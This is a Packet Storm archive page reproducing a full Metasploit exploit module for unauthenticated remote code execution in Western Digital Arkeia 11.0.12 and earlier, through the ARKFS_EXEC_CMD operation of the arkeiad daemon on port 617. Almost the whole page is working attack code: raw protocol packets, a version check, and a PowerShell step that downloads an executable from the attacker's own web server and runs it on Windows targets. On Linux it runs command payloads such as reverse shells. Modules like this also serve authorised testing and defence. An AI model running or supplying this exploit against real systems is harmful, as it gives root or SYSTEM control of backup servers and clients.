what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Western Digital Arkeia Remote Code Execution

Western Digital Arkeia Remote Code Execution
Posted Jul 13, 2015
Authored by xistence | Site metasploit.com

This Metasploit module exploits a code execution flaw in Western Digital Arkeia version 11.0.12 and below. The vulnerability exists in the 'arkeiad' daemon listening on TCP port 617. Because there are insufficient checks on the authentication of all clients, this can be bypassed. Using the ARKFS_EXEC_CMD operation it's possible to execute arbitrary commands with root or SYSTEM privileges. The daemon is installed on both the Arkeia server as well on all the backup clients. The module has been successfully tested on Windows, Linux, OSX, FreeBSD and OpenBSD.

tags | exploit, arbitrary, root, tcp, code execution
systems | linux, windows, freebsd, openbsd, apple
SHA-256 | 7b4c0df3265eff7d8bf05b564fe0ba2fea10cec409923415d3a6df2a68832eed

Western Digital Arkeia Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Western Digital Arkeia Remote Code Execution',
'Description' => %q{
This module exploits a code execution flaw in Western Digital Arkeia version 11.0.12 and below.
The vulnerability exists in the 'arkeiad' daemon listening on TCP port 617. Because there are
insufficient checks on the authentication of all clients, this can be bypassed.
Using the ARKFS_EXEC_CMD operation it's possible to execute arbitrary commands with root or
SYSTEM privileges.
The daemon is installed on both the Arkeia server as well on all the backup clients. The module
has been successfully tested on Windows, Linux, OSX, FreeBSD and OpenBSD.
},
'Author' =>
[
'xistence <xistence[at]0x90.nl>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
],
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'Windows',
{
'Arch' => ARCH_X86,
'Platform' => 'win',
}
],
[ 'Linux',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Payload' =>
{
'DisableNops' => true,
'Space' => 60000,
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'perl python bash-tcp gawk openssl'
}
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 10 2015'))

register_options(
[
Opt::RPORT(617),
OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15])
], self.class)
end

def check
connect

req = "\x00\x41"
req << "\x00" * 5
req << "\x73"
req << "\x00" * 12
req << "\xc0\xa8\x02\x74"
req << "\x00" * 56
req << "\x74\x02\xa8\xc0"
req << 'ARKADMIN'
req << "\x00"
req << 'root'
req << "\x00"
req << 'root'
req << "\x00" * 3
req << '4.3.0-1' # version?
req << "\x00" * 11

sock.put(req)

header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end

data_length = sock.get_once(2)

unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end

data_length = data_length.unpack('n')[0]

data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
return Exploit::CheckCode::Unknown
end

req = "\x00\x73"
req << "\x00" * 5
req << "\x0c\x32"
req << "\x00" * 11

sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end

data_length = sock.get_once(2)

unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end

data_length = data_length.unpack('n')[0]

data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
return Exploit::CheckCode::Unknown
end

req = "\x00\x61\x00\x04\x00\x01\x00\x11\x00\x00\x31\x00"
req << 'EN' # Language
req << "\x00" * 11

sock.put(req)
header = sock.get_once(6)

unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
disconnect
return Exploit::CheckCode::Unknown
end

data_length = sock.get_once(2)

unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end

data_length = data_length.unpack('n')[0]

unless data_length == 0
disconnect
return Exploit::CheckCode::Unknown
end

# ARKADMIN_GET_CLIENT_INFO
req = "\x00\x62\x00\x01"
req << "\x00" * 3
req << "\x26"
req << 'ARKADMIN_GET_CLIENT_INFO' # Function to request agent information
req << "\x00\x32\x38"
req << "\x00" * 11

sock.put(req)

header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
disconnect
return Exploit::CheckCode::Unknown
end

data_length = sock.get_once(2)

unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end

data_length = data_length.unpack('n')[0]
unless data_length == 0
disconnect
return Exploit::CheckCode::Unknown
end

req = "\x00\x63\x00\x04\x00\x00\x00\x12\x30\x00\x31\x00\x32\x38"
req << "\x00" * 12

sock.put(req)

# 1st packet

header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x63\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end

data_length = sock.get_once(2)

unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end

data_length = data_length.unpack('n')[0]

data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
return Exploit::CheckCode::Unknown
end

# 2nd packet

header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end

data_length = sock.get_once(2)

unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end

data_length = data_length.unpack('n')[0]

data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
return Exploit::CheckCode::Unknown
end

# 3rd packet

header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x65\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end

data_length = sock.get_once(2)

unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end

data_length = data_length.unpack('n')[0]

data = sock.get_once(data_length)
unless data && data.length == data_length && data.include?('You have successfully retrieved client information')
disconnect
return Exploit::CheckCode::Unknown
end

# 4th packet

header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x69\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end

data_length = sock.get_once(2)

unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end

data_length = data_length.unpack('n')[0]

data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
return Exploit::CheckCode::Unknown
end

if data =~ /VERSION.*WD Arkeia ([0-9]+\.[0-9]+\.[0-9]+)/
version = $1
vprint_status("#{rhost}:#{rport} - Arkeia version detected: #{version}")
if Gem::Version.new(version) <= Gem::Version.new('11.0.12')
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
else
vprint_status("#{rhost}:#{rport} - Arkeia version not detected")
return Exploit::CheckCode::Unknown
end
end

def exploit
if target.name =~ /Windows/

@down_file = rand_text_alpha(8+rand(8))
@pl = generate_payload_exe

begin
Timeout.timeout(datastore['HTTP_DELAY']) {super}
rescue Timeout::Error
end
elsif target.name =~ /Linux/
communicate(payload.encoded)
return
end
end

def primer
@payload_url = get_uri

# PowerShell web download. The char replacement is needed because using the "/" character twice (like https://)
# is not possible on Windows agents.
command = "PowerShell -Command \"$s=[CHAR][BYTE]47;$b=\\\"#{@payload_url.gsub(/\//, '$($s)')}\\\";"
command << "(New-Object System.Net.WebClient).DownloadFile($b,'c:/#{@down_file}.exe');"
command << "(New-Object -com Shell.Application).ShellExecute('c:/#{@down_file}.exe');\""

communicate(command)
end

def communicate(command)
print_status("#{rhost}:#{rport} - Connecting to Arkeia daemon")

connect

print_status("#{rhost}:#{rport} - Sending agent communication")

req = "\x00\x41\x00\x00\x00\x00\x00\x70"
req << "\x00" * 12
req << "\xc0\xa8\x02\x8a"
req << "\x00" * 56
req << "\x8a\x02\xa8\xc0"
req << 'ARKFS'
req << "\x00"
req << 'root'
req << "\x00"
req << 'root'
req << "\x00" * 3
req << '4.3.0-1' # Client version ?
req << "\x00" * 11

sock.put(req)

header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end

data_length = sock.get_once(2)

unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end

data_length = data_length.unpack('n')[0]

data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
end

req = "\x00\x73\x00\x00\x00\x00\x00\x0c\x32"
req << "\x00" * 11

sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end

data_length = sock.get_once(2)

unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end

data_length = data_length.unpack('n')[0]

data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
end

req = "\x00\x61\x00\x04\x00\x01\x00\x1a\x00\x00"
req << rand_text_numeric(10) # "1234567890" - 10 byte numerical value, like a session ID?
req << "\x00"
req << 'EN' # English language?
req << "\x00" * 11

sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end

data_length = sock.get_once(2)

unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end

data_length = data_length.unpack('n')[0]

unless data_length == 0
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unexpected length read")
end

req = "\x00\x62\x00\x01\x00\x02\x00\x1b"
req << 'ARKFS_EXEC_CMD' # With this function we can execute system commands with root/SYSTEM privileges
req << "\x00\x31"
req << "\x00" * 11

sock.put(req)

header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end

data_length = sock.get_once(2)

unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end

data_length = data_length.unpack('n')[0]

unless data_length == 0
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unexpected length read")
end

req = "\x00\x63\x00\x04\x00\x03\x00\x15\x31\x00\x31\x00\x31\x00\x30\x3a\x31\x2c"
req << "\x00" * 11

sock.put(req)

command_length = '%02x' % command.length
command_length = command_length.scan(/../).map { |x| x.hex.chr }.join

req = "\x00\x64\x00\x04\x00\x04"
req << [command.length].pack('n')
req << command # Our command to be executed
req << "\x00"

print_status("#{rhost}:#{rport} - Executing payload through ARKFS_EXEC_CMD")

sock.put(req)

header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x63\x00\x04"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end

data_length = sock.get_once(2)

unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end

data_length = data_length.unpack('n')[0]

data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
end

# 1st Packet

header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end

data_length = sock.get_once(2)

unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end

data_length = data_length.unpack('n')[0]

data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
end

# 2st Packet

header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end

data_length = sock.get_once(2)

unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end

data_length = data_length.unpack('n')[0]

data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
end
end

def on_request_uri(cli, request)
print_status("Request: #{request.uri}")
if request.uri == get_resource
print_status('Sending payload...')
send_response(cli, @pl)
register_files_for_cleanup("c:\\#{@down_file}.exe")
end
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close